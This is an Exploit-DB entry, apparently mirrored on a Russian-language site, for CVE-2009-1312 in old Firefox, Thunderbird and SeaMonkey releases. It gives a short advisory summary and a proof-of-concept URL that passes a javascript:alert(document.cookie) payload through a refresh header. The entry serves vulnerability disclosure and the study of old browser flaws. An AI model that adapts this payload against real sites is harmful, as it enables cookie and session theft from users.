- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32942
- Проверка EDB
-
- Пройдено
- Автор
- OLLI PETTAY
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-2009-1312
- Дата публикации
- 2009-04-22
Код:
source: https://www.securityfocus.com/bid/34656/info
The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox, Thunderbird, and SeaMonkey.
Attackers can exploit these issues to bypass same-origin restrictions, obtain potentially sensitive information, and execute arbitrary script code with elevated privileges; other attacks are also possible.
With request to script at web site:
http://www.example.com/script.php?param=javascript:alert(document.cookie)
Which returns in answer the refresh header:
refresh: 0; URL=javascript:alert(document.cookie)- Источник
- www.exploit-db.com
